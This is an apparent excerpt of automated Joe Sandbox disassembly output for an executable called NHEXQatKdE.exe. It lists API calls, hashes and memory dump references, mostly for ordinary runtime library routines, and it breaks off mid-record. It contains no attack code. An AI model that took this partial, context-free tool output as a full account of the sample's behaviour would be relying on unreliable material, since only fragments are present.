                                                                                                                                      • Snapshot File: hcaresult_0_2_6e0000_NHEXQatKdE.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: C:\Users\user\Desktop\NHEXQatKdE.exe
                                                                                                                                      • API String ID: 0-146086173
                                                                                                                                      • Opcode ID: 3b4dca759751ab1c6b6e3f86af5973434c9b9b4ccd09ad5054b8a655180c34cb
                                                                                                                                      • Instruction ID: 30966dc9e4cc1c0ba569fc0d47df8082977beccdbc2673929cfbd7128ee5ef88
                                                                                                                                      • Opcode Fuzzy Hash: 3b4dca759751ab1c6b6e3f86af5973434c9b9b4ccd09ad5054b8a655180c34cb
                                                                                                                                      • Instruction Fuzzy Hash: 102193B1202385AFDB20AF67CC819AB77AFEF04364B149529F919D7251EB30EC118794
                                                                                                                                      APIs
                                                                                                                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,8A2E6549,?,?,00000000,006F42A9,000000FF,?,006E556F,006E5456,?,006E560B,00000000), ref: 006E54E3
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 006E54F5
                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,00000000,006F42A9,000000FF,?,006E556F,006E5456,?,006E560B,00000000), ref: 006E5517
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.2179326552.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.2179281828.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179354545.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179402359.00000000006FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179422481.00000000006FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179448281.00000000006FE000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179468324.00000000006FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179490656.0000000000702000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_6e0000_NHEXQatKdE.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                                                                                      • API String ID: 4061214504-1276376045
                                                                                                                                      • Opcode ID: d846f00ca7520a3bb3fb7b662b8c16ffd75db935e0026539efdeac447d2a1fc7
                                                                                                                                      • Instruction ID: 7de72297281c916829d31cdcdfc5d3dc6940ac590f35679f05fea54e88e67299
                                                                                                                                      • Opcode Fuzzy Hash: d846f00ca7520a3bb3fb7b662b8c16ffd75db935e0026539efdeac447d2a1fc7
                                                                                                                                      • Instruction Fuzzy Hash: 0001D671914A59EFDB018F91DD09FBEBBBBFB44B18F004629F812E2690DF749900CA90
                                                                                                                                      APIs
                                                                                                                                      • __alloca_probe_16.LIBCMT ref: 006EC8BD
                                                                                                                                      • __alloca_probe_16.LIBCMT ref: 006EC986
                                                                                                                                      • __freea.LIBCMT ref: 006EC9ED
                                                                                                                                        • Part of subcall function 006E8CFD: RtlAllocateHeap.NTDLL(00000000,006E1A21,006E1807,?,006E29D3,006E1809,006E1807,?,?,?,006E19DE,006E1A21,006E180B,006E1807,006E1807,006E1807), ref: 006E8D2F
                                                                                                                                      • __freea.LIBCMT ref: 006ECA00
                                                                                                                                      • __freea.LIBCMT ref: 006ECA0D
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.2179326552.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.2179281828.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179354545.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179402359.00000000006FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179422481.00000000006FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179448281.00000000006FE000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179468324.00000000006FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179490656.0000000000702000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_6e0000_NHEXQatKdE.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: __freea$__alloca_probe_16$AllocateHeap
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1423051803-0
                                                                                                                                      • Opcode ID: 8b089dae535708019955d89f95d9ca3854d885e604f4d42209ed698dde1724c2
                                                                                                                                      • Instruction ID: 347923db100b643eaad98117692ffe7fbe5c910dbd0acde0c3d056f0b1c90a40
                                                                                                                                      • Opcode Fuzzy Hash: 8b089dae535708019955d89f95d9ca3854d885e604f4d42209ed698dde1724c2
                                                                                                                                      • Instruction Fuzzy Hash: 1351A4725023CAAFEB109F66CC42DFB3AABDF44760B25012DFD05D7252EA30DC128665
                                                                                                                                      APIs
                                                                                                                                      • LoadLibraryExW.KERNEL32(?,00000000,00000800,?,006EC66B,?,006E1809,006E1807,?,?,?,006EC4B3,00000000,FlsAlloc,006F61B0,006F61B8), ref: 006EC5DC
                                                                                                                                      • GetLastError.KERNEL32(?,006EC66B,?,006E1809,006E1807,?,?,?,006EC4B3,00000000,FlsAlloc,006F61B0,006F61B8,?,?,006E6855), ref: 006EC5E6
                                                                                                                                      • LoadLibraryExW.KERNEL32(?,00000000,00000000,?,?,006E6855,006E6939,00000003,006E38BB,?,?,?,?,00000000,006E1807,006E1807), ref: 006EC60E
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.2179326552.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.2179281828.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179354545.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179402359.00000000006FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179422481.00000000006FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179448281.00000000006FE000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179468324.00000000006FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179490656.0000000000702000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_6e0000_NHEXQatKdE.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: LibraryLoad$ErrorLast
                                                                                                                                      • String ID: api-ms-
                                                                                                                                      • API String ID: 3177248105-2084034818
                                                                                                                                      • Opcode ID: 635a63289acbd1232adfe1778a1cc95eef004b1633f88e9a19df7bdc2613d725
                                                                                                                                      • Instruction ID: 2695a1a8c3d116751cb260ddd4c36b9bee1c60ec6d30ab0b71fc1d30c04e837f
                                                                                                                                      • Opcode Fuzzy Hash: 635a63289acbd1232adfe1778a1cc95eef004b1633f88e9a19df7bdc2613d725
                                                                                                                                      • Instruction Fuzzy Hash: 3DE04870681344B7DF201FA6DC06B6D3B67AF00BD2F105031F90CA85E2D771E815C589
                                                                                                                                      APIs
                                                                                                                                      • GetConsoleOutputCP.KERNEL32(8A2E6549,00000000,00000000,?), ref: 006ECF62
                                                                                                                                        • Part of subcall function 006EBC8C: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,006EC9E3,?,00000000,-00000008), ref: 006EBCED
                                                                                                                                      • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 006ED1B4
                                                                                                                                      • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 006ED1FA
                                                                                                                                      • GetLastError.KERNEL32 ref: 006ED29D
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.2179326552.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.2179281828.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179354545.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179402359.00000000006FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179422481.00000000006FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179448281.00000000006FE000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179468324.00000000006FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179490656.0000000000702000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_6e0000_NHEXQatKdE.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2112829910-0
                                                                                                                                      • Opcode ID: db0fda45cfa075caff4e33604e3c2cdfe5b067690ea4276a875a00988aba41d8
                                                                                                                                      • Instruction ID: 1cc896459c7c58b9b123e7ef5760bccaa746337ff022205452212a70c4b8ec60
                                                                                                                                      • Opcode Fuzzy Hash: db0fda45cfa075caff4e33604e3c2cdfe5b067690ea4276a875a00988aba41d8
                                                                                                                                      • Instruction Fuzzy Hash: 81D16BB5D012889FCF15CFA9C880AEEBBB6FF49310F28416AE515EB351D630A942CB50
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.2179326552.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.2179281828.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179354545.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179402359.00000000006FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179422481.00000000006FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179448281.00000000006FE000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179468324.00000000006FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179490656.0000000000702000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_6e0000_NHEXQatKdE.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AdjustPointer
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1740715915-0
                                                                                                                                      • Opcode ID: a0c30fd6477b10d81d240149fe2ae3b68de2f426e6e2b280c5ab557c07436929
                                                                                                                                      • Instruction ID: 2d780972ffc3ce59dbd9c23b501b600ced7d850b698f5cbbbeac7d11aab22b50
                                                                                                                                      • Opcode Fuzzy Hash: a0c30fd6477b10d81d240149fe2ae3b68de2f426e6e2b280c5ab557c07436929
                                                                                                                                      • Instruction Fuzzy Hash: 1851DF7260230A9FFB28CF95D851BBA73ABEF00310F24412DEE0156292E731EC85CB90
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 006EBC8C: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,006EC9E3,?,00000000,-00000008), ref: 006EBCED
                                                                                                                                      • GetLastError.KERNEL32(?,?,?,00000000,00000000,?,006EB35E,?,?,?,00000000), ref: 006EB01C
                                                                                                                                      • __dosmaperr.LIBCMT ref: 006EB023
                                                                                                                                      • GetLastError.KERNEL32(00000000,006EB35E,?,?,00000000,?,?,?,00000000,00000000,?,006EB35E,?,?,?,00000000), ref: 006EB05D
                                                                                                                                      • __dosmaperr.LIBCMT ref: 006EB064
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.2179326552.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.2179281828.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179354545.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179402359.00000000006FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179422481.00000000006FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179448281.00000000006FE000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179468324.00000000006FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179490656.0000000000702000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_6e0000_NHEXQatKdE.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1913693674-0
                                                                                                                                      • Opcode ID: 3a09a0f7c72dff088ea1b71936027e9825277e422d31c7612ab7938b80e9f6e7
                                                                                                                                      • Instruction ID: a9be6e614674c57d3befd7757d18ef080a2b761b2113d71766f6d04707c7701a
                                                                                                                                      • Opcode Fuzzy Hash: 3a09a0f7c72dff088ea1b71936027e9825277e422d31c7612ab7938b80e9f6e7
                                                                                                                                      • Instruction Fuzzy Hash: 3E21AFB1202395AFDB20AFA3888196BB7ABFF00364710841CF86997250DB30FC41CBA1
                                                                                                                                      APIs
                                                                                                                                      • GetEnvironmentStringsW.KERNEL32 ref: 006EBD90
                                                                                                                                        • Part of subcall function 006EBC8C: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,006EC9E3,?,00000000,-00000008), ref: 006EBCED
                                                                                                                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 006EBDC8
                                                                                                                                      • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 006EBDE8
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.2179326552.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.2179281828.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179354545.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179402359.00000000006FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179422481.00000000006FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179448281.00000000006FE000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179468324.00000000006FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179490656.0000000000702000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_6e0000_NHEXQatKdE.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 158306478-0
                                                                                                                                      • Opcode ID: 03d57b1b519c94011a5b965768d471da0cd4fcbbb5136cd92fc10794fe6e252c
                                                                                                                                      • Instruction ID: e55b53eab1c5ad6dcc780777f42b85f194c8097130bcaa297ddcf77ecf625949
                                                                                                                                      • Opcode Fuzzy Hash: 03d57b1b519c94011a5b965768d471da0cd4fcbbb5136cd92fc10794fe6e252c
                                                                                                                                      • Instruction Fuzzy Hash: 2311E1F25073957FA71127F39C89CFF295EDE447D87242428FA0992101EF208D0182B6
                                                                                                                                      APIs
                                                                                                                                      • WriteConsoleW.KERNEL32(00000000,?,?,00000000,00000000,?,006F1734,00000000,00000001,?,?,?,006ED2F1,?,00000000,00000000), ref: 006F2967
                                                                                                                                      • GetLastError.KERNEL32(?,006F1734,00000000,00000001,?,?,?,006ED2F1,?,00000000,00000000,?,?,?,006ECC37,?), ref: 006F2973
                                                                                                                                        • Part of subcall function 006F29C4: CloseHandle.KERNEL32(FFFFFFFE,006F2983,?,006F1734,00000000,00000001,?,?,?,006ED2F1,?,00000000,00000000,?,?), ref: 006F29D4
                                                                                                                                      • ___initconout.LIBCMT ref: 006F2983
                                                                                                                                        • Part of subcall function 006F29A5: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,006F2941,006F1721,?,?,006ED2F1,?,00000000,00000000,?), ref: 006F29B8
                                                                                                                                      • WriteConsoleW.KERNEL32(00000000,?,?,00000000,?,006F1734,00000000,00000001,?,?,?,006ED2F1,?,00000000,00000000,?), ref: 006F2998
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.2179326552.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.2179281828.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179354545.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179402359.00000000006FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179422481.00000000006FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179448281.00000000006FE000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179468324.00000000006FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179490656.0000000000702000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_6e0000_NHEXQatKdE.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2744216297-0
                                                                                                                                      • Opcode ID: deef50bd1af7442bf39d045aebaf58814df045485b4142ef89ecd301e8824872
                                                                                                                                      • Instruction ID: 7d10ce78634c6f2683d0f72c37064e3da893c0dc933f546fbc5021e3abe67dcc
                                                                                                                                      • Opcode Fuzzy Hash: deef50bd1af7442bf39d045aebaf58814df045485b4142ef89ecd301e8824872
                                                                                                                                      • Instruction Fuzzy Hash: F4F01C3690011ABBCF222FD2DD18AE93F67FF093A5F155110FA0C86120C672C820EF92
                                                                                                                                      APIs
                                                                                                                                      • EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,006F069B,?,?,00000000,00000000,00000000,?), ref: 006F07BF
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.2179326552.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.2179281828.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179354545.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179402359.00000000006FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179422481.00000000006FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179448281.00000000006FE000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179468324.00000000006FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179490656.0000000000702000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_6e0000_NHEXQatKdE.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: EncodePointer
                                                                                                                                      • String ID: MOC$RCC
                                                                                                                                      • API String ID: 2118026453-2084237596
                                                                                                                                      • Opcode ID: 00dc6aeffbf7d341f489ee91e14065d46af1ab85d14c7ee7199d28017b84c4bb
                                                                                                                                      • Instruction ID: bfc52e4aeab4ca6d57117619860e593cb7154bdc249275f7dc10e148640bda76
                                                                                                                                      • Opcode Fuzzy Hash: 00dc6aeffbf7d341f489ee91e14065d46af1ab85d14c7ee7199d28017b84c4bb
                                                                                                                                      • Instruction Fuzzy Hash: EF416C7190020DEFEF15DF94CD81AEE7BB6BF08344F148159FA1467252D335A950DB91
                                                                                                                                      APIs
                                                                                                                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 006F027D
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.2179326552.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.2179281828.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179354545.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179402359.00000000006FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179422481.00000000006FD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179448281.00000000006FE000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179468324.00000000006FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.2179490656.0000000000702000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_6e0000_NHEXQatKdE.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ___except_validate_context_record
                                                                                                                                      • String ID: csm$csm
                                                                                                                                      • API String ID: 3493665558-3733052814
                                                                                                                                      • Opcode ID: 44d16d91017c7bebf5afb11ae0c996caec68100e57e60f95735ccbb32fa92ee3
                                                                                                                                      • Instruction ID: 83fd420f397b215d36861ed78a651814e2bcfe21d4910e6dbf6ad437a1c1efc0
                                                                                                                                      • Opcode Fuzzy Hash: 44d16d91017c7bebf5afb11ae0c996caec68100e57e60f95735ccbb32fa92ee3
                                                                                                                                      • Instruction Fuzzy Hash: 6431CF3740021EEBEF228F54CC448BE7B67FB0A715B18855AFA5449223C332CDA1DB91
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000003.00000002.2178967849.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                      • Associated: 00000003.00000002.2178950318.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000003.00000002.2178987110.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000003.00000002.2179015543.00000000006FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000003.00000002.2179034596.00000000006FE000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000003.00000002.2179051866.00000000006FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000003.00000002.2179074675.0000000000702000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_3_2_6e0000_NHEXQatKdE.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 96fd936941ea14c40cf15aa7d7a94fca463f635fe71879e8aa3b6861b8ead67f
                                                                                                                                      • Instruction ID: c0cb48cc56888c62f1f07bd9d3da6a03155c221ec057f02189b21e7519008ebe
                                                                                                                                      • Opcode Fuzzy Hash: 96fd936941ea14c40cf15aa7d7a94fca463f635fe71879e8aa3b6861b8ead67f
                                                                                                                                      • Instruction Fuzzy Hash: 79023C71E012599FDF14CFA9D8806EEBBF2FF48314F248269D519E7381D731AA068B94
                                                                                                                                      APIs
                                                                                                                                      • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 006EB2CB
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000003.00000002.2178967849.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                      • Associated: 00000003.00000002.2178950318.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000003.00000002.2178987110.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000003.00000002.2179015543.00000000006FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000003.00000002.2179034596.00000000006FE000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000003.00000002.2179051866.00000000006FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000003.00000002.2179074675.0000000000702000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_3_2_6e0000_NHEXQatKdE.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: FileFindFirst
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1974802433-0
                                                                                                                                      • Opcode ID: af3a6786db250e348d6469c66ffa35c3504aa12c108202707ca182f10d0928b1
                                                                                                                                      • Instruction ID: 5dfc03f4cc2648900493a3115fbd873daac004b72b4fd144b60281ced0a83012
                                                                                                                                      • Opcode Fuzzy Hash: af3a6786db250e348d6469c66ffa35c3504aa12c108202707ca182f10d0928b1
                                                                                                                                      • Instruction Fuzzy Hash: 5771F471C063989FDF21AF698C89AFEB7BAAF05300F1851D9E04C93251DB304E859F14
                                                                                                                                      APIs
                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 006E1632
                                                                                                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 006E1658
                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 006E1667
                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 006E17B2
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000003.00000002.2178967849.00000000006E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006E0000, based on PE: true
                                                                                                                                      • Associated: 00000003.00000002.2178950318.00000000006E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000003.00000002.2178987110.00000000006F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000003.00000002.2179015543.00000000006FC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000003.00000002.2179034596.00000000006FE000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000003.00000002.2179051866.00000000006FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000003.00000002.2179074675.0000000000702000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_3_2_6e0000_NHEXQatKdE.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CloseFileHandle$ReadSize
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 402376979-0
                                                                                                                                      • Opcode ID: 96197bebab3475913bda7d7a5ef5579782acea42364ade5425c96e81d45f7c16
                                                                                                                                      • Instruction ID: 05deed83852b95202f660d731efbf244c907aba13d306da49df45b20d0322fd7
